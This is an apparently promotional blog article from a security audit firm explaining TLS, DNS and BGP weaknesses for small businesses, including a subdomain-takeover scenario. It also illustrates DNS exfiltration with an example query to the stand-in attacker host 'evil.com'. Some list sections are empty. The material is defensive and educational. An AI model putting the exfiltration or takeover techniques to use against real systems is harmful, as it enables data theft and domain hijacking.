The invisible protocols that carry your applications
Your web application relies on layers of network protocols you may never configure directly: TLS for encryption, DNS for name resolution, BGP for internet routing. Flaws in these layers compromise your application regardless of your code quality.
TLS: when encryption falls short
Obsolete versions
TLS 1.0 and 1.1 were officially deprecated in 2021 (RFC 8996). They contain known cryptographic flaws (BEAST, POODLE). Some SMB applications still accept these versions for backward compatibility.
Weak cipher suites
Even with TLS 1.2, some cipher suites are vulnerable. Suites using CBC with MAC-then-encrypt, RSA suites without forward secrecy, and suites with keys shorter than 128 bits should be disabled.
Poorly managed certificates
Expired certificates, self-signed certificates in production, no automatic renewal. But also: wildcard certificates covering unrelated domains, or certificates that include internal domain names.
Check: openssl s_client -connect domain.com:443 to verify the certificate chain and accepted protocols.
DNS: name resolution can be hijacked
DNS spoofing and cache poisoning
An attacker who controls DNS responses redirects your domain to their server. DNSSEC protects against this but remains poorly deployed. Fewer than 10% of .fr domains are DNSSEC-signed.
Dangling DNS
A CNAME record pointing to a cloud service you've deleted. An attacker can claim that service and take over the subdomain. This is a subdomain takeover vector.
Example: your staging.myapp.com points to an S3 bucket staging.myapp.com.s3.amazonaws.com that you've deleted. An attacker creates a bucket with the same name and controls the content served on your subdomain.
DNS exfiltration
DNS is rarely filtered by firewalls. An attacker can exfiltrate data by encoding it in DNS queries: base64encodeddata.evil.com. Each query carries a few bytes of stolen data.
BGP: internet routing is vulnerable
BGP hijacking
BGP is the routing protocol between internet providers. It relies on mutual trust without cryptographic verification. An operator (malicious or by mistake) can announce your IP prefixes and intercept your traffic. In 2018, traffic to Amazon Route 53 was diverted to steal cryptocurrency.
Impact for an SMB
You don't control BGP directly, but you can:
Cross-cutting defenses
At CleanIssue, we check TLS configuration, DNS records, and network security headers during every audit. Request your audit call.
Related articles
Three adjacent analyses to keep exploring the same attack surface.
Kubernetes: 7 critical vulnerabilities we find in audits
The seven most frequent Kubernetes configuration flaws in our audits: RBAC, secrets, network policies, privileged pods, and more.
ZooKeeper and CVE-2026-24308: when configuration leaks into logs
CVE-2026-24308 shows how mishandled configuration values can expose sensitive data in ZooKeeper client logs.
AWS, GCP, Azure cloud security: the 10 most common IAM mistakes
The IAM configuration mistakes that expose your cloud infrastructure: excessive permissions, static credentials, missing MFA, and more.
Sources
Editorial analysis based on official vendor, project, and regulator documentation.
Related services
If this topic maps to a real risk in your stack, these are the most relevant CleanIssue audits.